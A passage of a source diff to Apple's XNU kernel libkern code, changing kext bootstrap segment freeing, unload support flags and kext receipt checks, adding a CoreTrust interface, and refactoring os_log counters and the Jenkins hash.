*/ // xxx - should rename KLD segment - seg_to_remove = getsegbyname("__KLD"); - if (seg_to_remove) { - OSRuntimeUnloadCPPForSegment(seg_to_remove); + seg_kld = getsegbyname("__KLD"); + seg_klddata = getsegbyname("__KLDDATA"); + if (seg_klddata) { + // __mod_term_func is part of __KLDDATA + OSRuntimeUnloadCPPForSegment(seg_klddata); } #if __arm__ || __arm64__ - /* Free the memory that was set up by bootx. + /* Free the memory that was set up by iBoot. + */ +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* We cannot free the KLD segment with CTRR enabled as it contains text and + * is covered by the contiguous rorgn. */ dt_segment_name = "Kernel-__KLD"; if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) { - /* We cannot free this with KTRR enabled, as we cannot - * update the permissions on the KLD range this late - * in the boot process. - */ IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress, - (int)segment_size); + (int)segment_size); // calls ml_static_mfree + } else if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) { + /* With fileset KCs, the Kernel KLD segment is not recorded in the DT. */ + ml_static_mfree(ml_static_ptovirt(seg_kld->vmaddr - gVirtBase + gPhysBase), + seg_kld->vmsize); + } +#endif + dt_segment_name = "Kernel-__KLDDATA"; + if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) { + IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress, + (int)segment_size); // calls ml_static_mfree + } else if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) { + /* With fileset KCs, the Kernel KLDDATA segment is not recorded in the DT. */ + ml_static_mfree(ml_static_ptovirt(seg_klddata->vmaddr - gVirtBase + gPhysBase), + seg_klddata->vmsize); } #elif __i386__ || __x86_64__ /* On x86, use the mapping data from the segment load command to - * unload KLD directly. + * unload KLD & KLDDATA directly. 
* This may invalidate any assumptions about "avail_start" * defining the lower bound for valid physical addresses. */ - if (seg_to_remove && seg_to_remove->vmaddr && seg_to_remove->vmsize) { - bzero((void *)seg_to_remove->vmaddr, seg_to_remove->vmsize); - ml_static_mfree(seg_to_remove->vmaddr, seg_to_remove->vmsize); + if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) { + bzero((void *)seg_kld->vmaddr, seg_kld->vmsize); + ml_static_mfree(seg_kld->vmaddr, seg_kld->vmsize); + } + if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) { + bzero((void *)seg_klddata->vmaddr, seg_klddata->vmsize); + ml_static_mfree(seg_klddata->vmaddr, seg_klddata->vmsize); } #else #error arch #endif - seg_to_remove = NULL; - /***** * Prelinked kernel's symtab (if there is one). */ @@ -1062,7 +1082,7 @@ OSKext::removeKextBootstrap(void) } } - seg_to_remove = (kernel_segment_command_t *)getsegbyname("__LINKEDIT"); + seg_linkedit = (kernel_segment_command_t *)getsegbyname("__LINKEDIT"); /* kxld always needs the kernel's __LINKEDIT segment, but we can make it * pageable, unless keepsyms is set. To do that, we have to copy it from @@ -1084,9 +1104,9 @@ OSKext::removeKextBootstrap(void) vm_map_offset_t seg_copy_offset = 0; vm_map_size_t seg_length = 0; - seg_data = (void *) seg_to_remove->vmaddr; - seg_offset = (vm_map_offset_t) seg_to_remove->vmaddr; - seg_length = (vm_map_size_t) seg_to_remove->vmsize; + seg_data = (void *) seg_linkedit->vmaddr; + seg_offset = (vm_map_offset_t) seg_linkedit->vmaddr; + seg_length = (vm_map_size_t) seg_linkedit->vmsize; /* Allocate space for the LINKEDIT copy. */ @@ -1169,8 +1189,6 @@ OSKext::removeKextBootstrap(void) } #endif // VM_MAPPED_KEXTS - seg_to_remove = NULL; - result = kOSReturnSuccess; return result; @@ -1590,7 +1608,7 @@ bool OSKext::setAutounloadEnabled(bool flag) { bool result = flags.autounloadEnabled ? true : false; - flags.autounloadEnabled = flag ? 1 : 0; + flags.autounloadEnabled = flag ? 
(0 == flags.unloadUnsupported) : 0; if (result != (flag ? true : false)) { OSKextLog(this, @@ -1891,6 +1909,8 @@ OSKext::initWithPrelinkedInfoDict( getPropertyForHostArch(kOSBundleAllowUserLoadKey) == kOSBooleanTrue); if (shouldSaveSegments) { flags.resetSegmentsFromImmutableCopy = 1; + } else { + flags.unloadUnsupported = 1; } break; case KCKindPageable: @@ -1901,6 +1921,8 @@ OSKext::initWithPrelinkedInfoDict( flags.resetSegmentsFromImmutableCopy = 1; } else if (resetAuxKCSegmentOnUnload) { flags.resetSegmentsFromVnode = 1; + } else { + flags.unloadUnsupported = 1; } break; default: @@ -4084,6 +4106,15 @@ OSKext::removeKext( if (aKext->countRequestCallbacks()) { goto finish; } + if (aKext->flags.unloadUnsupported) { + result = kOSKextReturnInUse; + OSKextLog(aKext, + kOSKextLogErrorLevel | + kOSKextLogKextBookkeepingFlag, + "Can't remove kext %s; unsupported by cache.", + aKext->getIdentifierCString()); + goto finish; + } /* If we are terminating, send the request to the IOCatalogue * (which will actually call us right back but that's ok we have @@ -8978,7 +9009,7 @@ OSKext::addClass( getIdentifierCString(), aClass->getClassName()); - flags.autounloadEnabled = 1; + flags.autounloadEnabled = (0 == flags.unloadUnsupported); break; } } @@ -11829,6 +11860,24 @@ OSKext::loadFileSetKexts(OSDictionary * requestDict __unused) allow_fileset_load = false; #endif + /* + * Change with 70582300 + */ +#if 0 || !defined(VM_MAPPED_KEXTS) + /* + * On platforms that don't support the SystemKC or a file-backed + * AuxKC, the kext receipt for 3rd party kexts loaded by the booter + * needs to be queried before we load any codeless kexts or release + * any 3rd party kexts to run. On platforms that support a file-backed + * AuxKC, this process is done via the kext audit mechanism. 
+ */ + + printf("KextLog: waiting for kext receipt to be queried.\n"); + while (!IOServiceWaitForMatchingResource(kOSKextReceiptQueried, UINT64_MAX)) { + IOSleep(30); + } +#endif /* !VM_MAPPED_KEXTS */ + /* * Get the args from the request. Right now we need the file * name for the pageable and the aux kext collection file sets. @@ -11910,6 +11959,21 @@ try_auxkc: OSDictionary *infoDict; parsedXML = consumeDeferredKextCollection(KCKindAuxiliary); infoDict = OSDynamicCast(OSDictionary, parsedXML.get()); +#if !defined(VM_MAPPED_KEXTS) + /* + * On platforms where we don't dynamically wire-down / page-in + * kext memory, we need to maintain the invariant that if the + * AuxKC in memory does not contain a kext receipt, then we + * should not load any of the kexts. + */ + size_t receipt_sz = 0; + if (getsectdatafromheader(akc_mh, kReceiptInfoSegment, kAuxKCReceiptSection, &receipt_sz) == NULL || receipt_sz == 0) { + OSKextLog(/* kext */ NULL, kOSKextLogErrorLevel | kOSKextLogArchiveFlag, + "KextLog: WARNING: Failed to load AuxKC from memory: missing receipt"); + ret = kOSKextReturnKCLoadFailure; + goto try_codeless; + } +#endif if (infoDict) { bool added; printf("KextLog: Adding kexts from in-memory AuxKC\n"); @@ -15251,6 +15315,17 @@ OSKextSavedMutableSegment::restoreContents(kernel_segment_command_t *seg) return kOSReturnSuccess; } +extern "C" kern_return_t +OSKextSetReceiptQueried(void) +{ + OSKextLog(/* kext */ NULL, + kOSKextLogStepLevel | kOSKextLogGeneralFlag, + "Setting kext receipt as queried"); + + IOService::publishResource(kOSKextReceiptQueried, kOSBooleanTrue); + return KERN_SUCCESS; +} + extern "C" const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t address) { diff --git a/libkern/c++/OSRuntime.cpp b/libkern/c++/OSRuntime.cpp index 40bd13b6f..de210c18a 100644 --- a/libkern/c++/OSRuntime.cpp +++ b/libkern/c++/OSRuntime.cpp @@ -330,7 +330,14 @@ finish: } #if defined(HAS_APPLE_PAC) -static inline void +#if !KASAN +/* + * Place this function 
in __KLD,__text on non-kasan builds so it gets unmapped + * after CTRR lockdown. + */ +__attribute__((noinline, section("__KLD,__text"))) +#endif +static void OSRuntimeSignStructorsInSegment(kernel_segment_command_t *segment) { kernel_section_t * section; diff --git a/libkern/conf/files b/libkern/conf/files index e5b444617..0ffca5b4f 100644 --- a/libkern/conf/files +++ b/libkern/conf/files @@ -55,6 +55,8 @@ libkern/stdio/scanf.c standard libkern/uuid/uuid.c standard libkern/os/log.c standard +libkern/os/log_encode.c standard +libkern/os/log_mem.c standard libkern/os/object.c standard libkern/os/internal.c standard libkern/os/refcnt.c standard @@ -96,6 +98,8 @@ libkern/crypto/corecrypto_rand.c optional crypto libkern/crypto/corecrypto_rsa.c optional crypto libkern/crypto/corecrypto_chacha20poly1305.c optional crypto +libkern/coretrust/coretrust.c standard + libkern/img4/interface.c standard libkern/stack_protector.c standard diff --git a/libkern/coretrust/coretrust.c b/libkern/coretrust/coretrust.c new file mode 100644 index 000000000..4a8f08b85 --- /dev/null +++ b/libkern/coretrust/coretrust.c @@ -0,0 +1,18 @@ +#include +#include +#include + +#if defined(SECURITY_READ_ONLY_LATE) +SECURITY_READ_ONLY_LATE(const coretrust_t *) coretrust = NULL; +#else +const coretrust_t *coretrust = NULL; +#endif + +void +coretrust_interface_register(const coretrust_t *ct) +{ + if (coretrust) { + panic("coretrust interface already set"); + } + coretrust = ct; +} diff --git a/libkern/firehose/chunk_private.h b/libkern/firehose/chunk_private.h index ac3fbe92e..513fd2082 100644 --- a/libkern/firehose/chunk_private.h +++ b/libkern/firehose/chunk_private.h @@ -64,6 +64,7 @@ typedef struct firehose_chunk_range_s { uint16_t fcr_length; } *firehose_chunk_range_t; +#if __has_include() #if defined(KERNEL) || defined(OS_FIREHOSE_SPI) OS_ALWAYS_INLINE @@ -181,6 +182,7 @@ firehose_chunk_tracepoint_end(firehose_chunk_t fc, #endif // OS_ATOMIC_HAS_STARVATION_FREE_RMW || 
!OS_ATOMIC_CONFIG_STARVATION_FREE_ONLY #endif // defined(KERNEL) || defined(OS_FIREHOSE_SPI) +#endif // __has_include() __END_DECLS diff --git a/libkern/firehose/firehose_types_private.h b/libkern/firehose/firehose_types_private.h index 27fef1448..9770351bf 100644 --- a/libkern/firehose/firehose_types_private.h +++ b/libkern/firehose/firehose_types_private.h @@ -78,6 +78,7 @@ OS_ENUM(firehose_stream, uint8_t, firehose_stream_memory_baseband = 6, _firehose_stream_max, + _firehose_stream_disabled = (uint8_t)-1, ); /*! @@ -131,9 +132,10 @@ OS_OPTIONS(firehose_tracepoint_flags, uint16_t, _firehose_tracepoint_flags_pc_style_main_plugin = 0x0003 << 1, _firehose_tracepoint_flags_pc_style_absolute = 0x0004 << 1, _firehose_tracepoint_flags_pc_style_uuid_relative = 0x0005 << 1, - _firehose_tracepoint_flags_pc_style__unused6 = 0x0006 << 1, + _firehose_tracepoint_flags_pc_style_large_shared_cache = 0x0006 << 1, _firehose_tracepoint_flags_pc_style__unused7 = 0x0007 << 1, _firehose_tracepoint_flags_base_has_unique_pid = 0x0010, + _firehose_tracepoint_flags_base_has_large_offset = 0x0020, ); /* @@ -264,14 +266,18 @@ OS_ENUM(_firehose_tracepoint_type_signpost, firehose_tracepoint_type_t, * @abstract * Flags for Log tracepoints (namespace signpost). * - * When flags are shared with the log type, they should havethe same values. + * When flags are shared with the log type, they should have the same values. 
*/ OS_OPTIONS(_firehose_tracepoint_flags_signpost, uint16_t, + // shared with log _firehose_tracepoint_flags_signpost_has_private_data = 0x0100, _firehose_tracepoint_flags_signpost_has_subsystem = 0x0200, _firehose_tracepoint_flags_signpost_has_rules = 0x0400, _firehose_tracepoint_flags_signpost_has_oversize = 0x0800, _firehose_tracepoint_flags_signpost_has_context_data = 0x1000, + + // specific to signpost + _firehose_tracepoint_flags_signpost_has_name = 0x8000, ); /* MIG firehose push reply structure */ diff --git a/libkern/firehose/tracepoint_private.h b/libkern/firehose/tracepoint_private.h index 69c04c982..70c248722 100644 --- a/libkern/firehose/tracepoint_private.h +++ b/libkern/firehose/tracepoint_private.h @@ -27,7 +27,11 @@ #if KERNEL #include #endif +#if __has_include() #include +#else +#include +#endif #include "firehose_types_private.h" OS_ASSUME_NONNULL_BEGIN diff --git a/libkern/libkern/Makefile b/libkern/libkern/Makefile index 3f78b8f25..c7b51b5e6 100644 --- a/libkern/libkern/Makefile +++ b/libkern/libkern/Makefile @@ -10,7 +10,8 @@ INSTINC_SUBDIRS = \ machine \ c++ \ crypto \ - img4 + img4 \ + coretrust INSTINC_SUBDIRS_X86_64 = \ i386 INSTINC_SUBDIRS_X86_64H = \ diff --git a/libkern/libkern/OSKextLibPrivate.h b/libkern/libkern/OSKextLibPrivate.h index 6297be81c..90d7aaede 100644 --- a/libkern/libkern/OSKextLibPrivate.h +++ b/libkern/libkern/OSKextLibPrivate.h @@ -786,6 +786,12 @@ void kext_dump_panic_lists(int (*printf_func)(const char *fmt, ...)); #ifdef XNU_KERNEL_PRIVATE +/*! + * @define kOSKextReceiptQueried + * @abstract Whether or not the kext receipt has been successfully loaded. 
+ */ +#define kOSKextReceiptQueried "OSKextReceiptQueried" + #if PRAGMA_MARK #pragma mark - /********************************************************************/ @@ -981,6 +987,7 @@ extern const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t a extern uint32_t OSKextGetKmodIDForSite(const vm_allocation_site_t * site, char * name, vm_size_t namelen); extern void OSKextFreeSite(vm_allocation_site_t * site); +extern kern_return_t OSKextSetReceiptQueried(void); #if CONFIG_IMAGEBOOT extern int OSKextGetUUIDForName(const char *, uuid_t); diff --git a/libkern/libkern/c++/OSKext.h b/libkern/libkern/c++/OSKext.h index aff038533..cc456e254 100644 --- a/libkern/libkern/c++/OSKext.h +++ b/libkern/libkern/c++/OSKext.h @@ -315,6 +315,7 @@ private: unsigned int CPPInitialized:1; unsigned int jettisonLinkeditSeg:1; unsigned int resetSegmentsFromImmutableCopy:1; + unsigned int unloadUnsupported:1; } flags; uint32_t matchingRefCount; diff --git a/libkern/libkern/c++/OSString.h b/libkern/libkern/c++/OSString.h index c8cd5025f..463eb6a89 100644 --- a/libkern/libkern/c++/OSString.h +++ b/libkern/libkern/c++/OSString.h @@ -117,12 +117,12 @@ protected: unsigned int flags:14, length:18; - char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;; + char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string; #else /* APPLE_KEXT_ALIGN_CONTAINERS */ protected: - char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;; + char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string; unsigned int flags; unsigned int length; diff --git a/libkern/libkern/coretrust/Makefile b/libkern/libkern/coretrust/Makefile new file mode 100644 index 000000000..8faf50fee --- /dev/null +++ b/libkern/libkern/coretrust/Makefile @@ -0,0 +1,24 @@ +export MakeInc_cmd=${SRCROOT}/makedefs/MakeInc.cmd +export MakeInc_def=${SRCROOT}/makedefs/MakeInc.def +export MakeInc_rule=${SRCROOT}/makedefs/MakeInc.rule +export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir + +include $(MakeInc_cmd) +include $(MakeInc_def) + 
+DATAFILES = +PRIVATE_DATAFILES = +KERNELFILES = +PRIVATE_KERNELFILES = coretrust.h + +INSTALL_MI_LIST = ${DATAFILES} +INSTALL_MI_LCL_LIST = ${PRIVATE_DATAFILES} +INSTALL_KF_MI_LIST = ${KERNELFILES} +INSTALL_KF_MI_LCL_LIST = ${PRIVATE_KERNELFILES} +EXPORT_MI_LIST = ${INSTALL_KF_MI_LCL_LIST} + +INSTALL_MI_DIR = libkern/coretrust +EXPORT_MI_DIR = libkern/coretrust + +include $(MakeInc_rule) +include $(MakeInc_dir) \ No newline at end of file diff --git a/libkern/libkern/coretrust/coretrust.h b/libkern/libkern/coretrust/coretrust.h new file mode 100644 index 000000000..dafe3db8a --- /dev/null +++ b/libkern/libkern/coretrust/coretrust.h @@ -0,0 +1,93 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef __CORETRUST_H +#define __CORETRUST_H + +#include +#include +#include + +#if XNU_KERNEL_PRIVATE +/* + * Only include this when building for XNU. CoreTrust will include its + * local copy of the header. + */ +#include +#endif + +/* + * We add more definitions as the need for them arises. Please refer + * to for more information. + */ + +typedef int (*coretrust_CTEvaluateAMFICodeSignatureCMS_t)( + const uint8_t *cms_data, + size_t cms_data_length, + const uint8_t *detached_data, + size_t detached_data_length, + bool allow_test_hierarchy, + const uint8_t **leaf_certificate, + size_t *leaf_certificate_length, + CoreTrustPolicyFlags *policy_flags, + CoreTrustDigestType *cms_digest_type, + CoreTrustDigestType *hash_agility_digest_type, + const uint8_t **digest_data, + size_t *digest_length + ); + +typedef struct _coretrust { + coretrust_CTEvaluateAMFICodeSignatureCMS_t CTEvaluateAMFICodeSignatureCMS; +} coretrust_t; + +__BEGIN_DECLS + +/*! + * @const coretrust + * The CoreTrust interface that was registered. + */ +extern const coretrust_t *coretrust; + +/*! + * @function coretrust_interface_register + * Registers the CoreTrust kext interface for use within the kernel proper. + * + * @param ct + * The interface to register. + * + * @discussion + * This routine may only be called once and must be called before late-const has + * been applied to kernel memory. 
+ */ +OS_EXPORT OS_NONNULL1 +void +coretrust_interface_register(const coretrust_t *ct); + +__END_DECLS + +#endif // __CORETRUST_H diff --git a/libkern/libkern/ptrauth_utils.h b/libkern/libkern/ptrauth_utils.h index 765b93320..5aa469bab 100644 --- a/libkern/libkern/ptrauth_utils.h +++ b/libkern/libkern/ptrauth_utils.h @@ -58,10 +58,10 @@ */ #if __has_feature(ptrauth_calls) ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags); +ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags); #else static inline ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags) +ptrauth_utils_sign_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags) { return 0; } @@ -89,10 +89,10 @@ ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, */ #if __has_feature(ptrauth_calls) void -ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature); +ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature); #else static inline void -ptrauth_utils_auth_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature) +ptrauth_utils_auth_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature) { return; } diff --git a/libkern/os/atomic_private_impl.h b/libkern/os/atomic_private_impl.h index 276a91f5e..933b0efa3 100644 --- a/libkern/os/atomic_private_impl.h +++ b/libkern/os/atomic_private_impl.h @@ -243,8 +243,8 @@ _os_atomic_mo_has_release(OS_ATOMIC_STD memory_order ord) #define 
_os_atomic_clang_op(p, v, m, o, op) ({ \ __auto_type _v = _os_atomic_value_cast(p, v); \ - __auto_type _r = _os_atomic_clang_op_orig(p, _v, m, o); \ - op(_r, _v); \ + __auto_type _s = _os_atomic_clang_op_orig(p, _v, m, o); \ + op(_s, _v); \ }) #if OS_ATOMIC_CONFIG_MEMORY_ORDER_DEPENDENCY diff --git a/libkern/os/hash.h b/libkern/os/hash.h index 264146fb9..3e90258e8 100644 --- a/libkern/os/hash.h +++ b/libkern/os/hash.h @@ -34,6 +34,30 @@ __BEGIN_DECLS +static inline uint32_t +os_hash_jenkins_update(const void *data, size_t length, uint32_t hash) +{ + const uint8_t *key = (const uint8_t *)data; + + for (size_t i = 0; i < length; i++) { + hash += key[i]; + hash += (hash << 10); + hash ^= (hash >> 6); + } + + return hash; +} + +static inline uint32_t +os_hash_jenkins_finish(uint32_t hash) +{ + hash += (hash << 3); + hash ^= (hash >> 11); + hash += (hash << 15); + + return hash; +} + /*! * @function os_hash_jenkins * @@ -56,20 +80,7 @@ __BEGIN_DECLS static inline uint32_t os_hash_jenkins(const void *data, size_t length) { - const uint8_t *key = (const uint8_t *)data; - uint32_t hash = 0; - - for (size_t i = 0; i < length; i++) { - hash += key[i]; - hash += (hash << 10); - hash ^= (hash >> 6); - } - - hash += (hash << 3); - hash ^= (hash >> 11); - hash += (hash << 15); - - return hash; + return os_hash_jenkins_finish(os_hash_jenkins_update(data, length, 0)); } /*! 
diff --git a/libkern/os/log.c b/libkern/os/log.c index 0cd4a9deb..c36981561 100644 --- a/libkern/os/log.c +++ b/libkern/os/log.c @@ -37,6 +37,7 @@ #include "trace_internal.h" #include "log_encode.h" +#include "log_mem.h" struct os_log_s { int a; @@ -44,6 +45,9 @@ struct os_log_s { struct os_log_s _os_log_default; struct os_log_s _os_log_replay; + +LOGMEM_STATIC_INIT(os_log_mem, 14, 9, 10); + extern vm_offset_t kernel_firehose_addr; extern firehose_chunk_t firehose_boot_chunk; @@ -65,24 +69,26 @@ extern int oslog_stream_open; extern void *OSKextKextForAddress(const void *); /* Counters for persistence mode */ -uint32_t oslog_p_total_msgcount = 0; -uint32_t oslog_p_metadata_saved_msgcount = 0; -uint32_t oslog_p_metadata_dropped_msgcount = 0; -uint32_t oslog_p_error_count = 0; -uint32_t oslog_p_saved_msgcount = 0; -uint32_t oslog_p_dropped_msgcount = 0; -uint32_t oslog_p_boot_dropped_msgcount = 0; -uint32_t oslog_p_coprocessor_total_msgcount = 0; -uint32_t oslog_p_coprocessor_dropped_msgcount = 0; +SCALABLE_COUNTER_DEFINE(oslog_p_total_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_metadata_saved_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_metadata_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_error_count); +SCALABLE_COUNTER_DEFINE(oslog_p_saved_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_boot_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_total_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_unresolved_kc_msgcount); /* Counters for streaming mode */ -uint32_t oslog_s_total_msgcount = 0; -uint32_t oslog_s_error_count = 0; -uint32_t oslog_s_metadata_msgcount = 0; +SCALABLE_COUNTER_DEFINE(oslog_s_error_count); +/* Protected by the stream lock */ +uint32_t oslog_s_total_msgcount; +uint32_t oslog_s_metadata_msgcount; /* Counters for msgbuf logging */ -uint32_t oslog_msgbuf_msgcount = 0; -uint32_t oslog_msgbuf_dropped_msgcount = 0; 
+SCALABLE_COUNTER_DEFINE(oslog_msgbuf_msgcount) +SCALABLE_COUNTER_DEFINE(oslog_msgbuf_dropped_msgcount) static bool oslog_boot_done = false; @@ -112,36 +118,36 @@ static void _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool logging, bool addcr); static void -_os_log_to_log_internal(os_log_t oslog, os_log_type_t type, - const char *format, va_list args, void *addr, void *dso, bool driverKit); +_os_log_to_log_internal(os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit); - -static void -_os_log_actual(os_log_t oslog, os_log_type_t type, const char *format, void - *dso, void *addr, os_log_buffer_context_t context, bool driverKit); +static bool +os_log_turned_off(void) +{ + return atm_get_diagnostic_config() & (ATM_TRACE_DISABLE | ATM_TRACE_OFF); +} bool os_log_info_enabled(os_log_t log __unused) { - return true; + return !os_log_turned_off(); } bool os_log_debug_enabled(os_log_t log __unused) { - return true; + return !os_log_turned_off(); } -os_log_t -os_log_create(const char *subsystem __unused, const char *category __unused) +static bool +os_log_disabled(void) { - return &_os_log_default; + return atm_get_diagnostic_config() & ATM_TRACE_DISABLE; } -bool -_os_log_string_is_public(const char *str __unused) +os_log_t +os_log_create(const char *subsystem __unused, const char *category __unused) { - return true; + return &_os_log_default; } __attribute__((noinline, not_tail_called)) void @@ -226,29 +232,20 @@ static void _os_log_with_args_internal(os_log_t oslog, os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit, bool addcr) { - uint32_t logging_config = atm_get_diagnostic_config(); - boolean_t safe; - boolean_t logging; - if (format[0] == '\0') { return; } /* early boot can log to dmesg for later replay (27307943) */ - safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe()); - - if (logging_config & ATM_TRACE_DISABLE || logging_config & 
ATM_TRACE_OFF) { - logging = false; - } else { - logging = true; - } + bool safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe()); + bool logging = !os_log_turned_off(); if (oslog != &_os_log_replay) { _os_log_to_msgbuf_internal(format, args, safe, logging, addcr); } if (safe && logging) { - _os_log_to_log_internal(oslog, type, format, args, addr, dso, driverKit); + _os_log_to_log_internal(type, format, args, addr, dso, driverKit); } } @@ -268,7 +265,7 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log va_list args_copy; if (!bsd_log_lock(safe)) { - os_atomic_inc(&oslog_msgbuf_dropped_msgcount, relaxed); + counter_inc(&oslog_msgbuf_dropped_msgcount); return; } @@ -350,177 +347,101 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log bsd_log_unlock(); logwakeup(msgbufp); - os_atomic_inc(&oslog_msgbuf_msgcount, relaxed); + counter_inc(&oslog_msgbuf_msgcount); } -static void -_os_log_to_log_internal(os_log_t oslog, os_log_type_t type, - const char *format, va_list args, void *addr, void *dso, bool driverKit) +static firehose_stream_t +firehose_stream(os_log_type_t type) { - kc_format_t kcformat = KCFormatUnknown; - struct os_log_buffer_context_s context; - unsigned char buffer_data[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))); - os_log_buffer_t buffer = (os_log_buffer_t)buffer_data; - uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE]; - va_list args_copy; - - if (addr == NULL) { - return; - } - - if (!PE_get_primary_kc_format(&kcformat)) { - return; - } - - if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { - void *baseAddress = PE_get_kc_baseaddress(KCKindPrimary); - if (!baseAddress) { - return; - } - dso = baseAddress; - } else if (kcformat == KCFormatDynamic || kcformat == KCFormatFileset) { - if (dso == NULL) { - dso = (void *) OSKextKextForAddress(format); - if (dso == NULL) { - return; - } - } - if (!_os_trace_addr_in_text_segment(dso, format)) { - return; - } - if 
(!driverKit) { - void *dso_addr = (void *) OSKextKextForAddress(addr); - if (dso != dso_addr) { - return; - } - } - } - - memset(&context, 0, sizeof(context)); - memset(buffer, 0, OS_LOG_BUFFER_MAX_SIZE); + return (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) ? + firehose_stream_memory : firehose_stream_persist; +} - context.shimmed = true; - context.buffer = buffer; - context.content_sz = OS_LOG_BUFFER_MAX_SIZE - sizeof(*buffer); - context.pubdata = pubdata; - context.pubdata_sz = sizeof(pubdata); +static void +_os_log_actual(os_log_type_t type, const char *format, void *dso, void *addr, uint8_t *logdata, size_t logdata_sz, + firehose_tracepoint_flags_t flags, bool driverKit) +{ + firehose_tracepoint_id_u trace_id; - va_copy(args_copy, args); + firehose_stream_t stream = firehose_stream(type); + uint64_t timestamp = firehose_tracepoint_time(firehose_activity_flags_default); - os_atomic_inc(&oslog_p_total_msgcount, relaxed); - if (_os_log_encode(format, args_copy, 0, &context)) { - _os_log_actual(oslog, type, format, dso, addr, &context, driverKit); + if (driverKit) { + // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in + // the executable text + trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, + type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT)); } else { - os_atomic_inc(&oslog_p_error_count, relaxed); + // create trace_id after we've set additional flags + trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, + type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags)); } - va_end(args_copy); + + _firehose_trace(stream, trace_id, timestamp, logdata, logdata_sz, true); } -static inline size_t -_os_trace_write_location_for_address(uint8_t buf[static sizeof(uint64_t)], - void *dso, const void *address, firehose_tracepoint_flags_t *flags, __unused bool driverKit) +static void * +resolve_dso(const char 
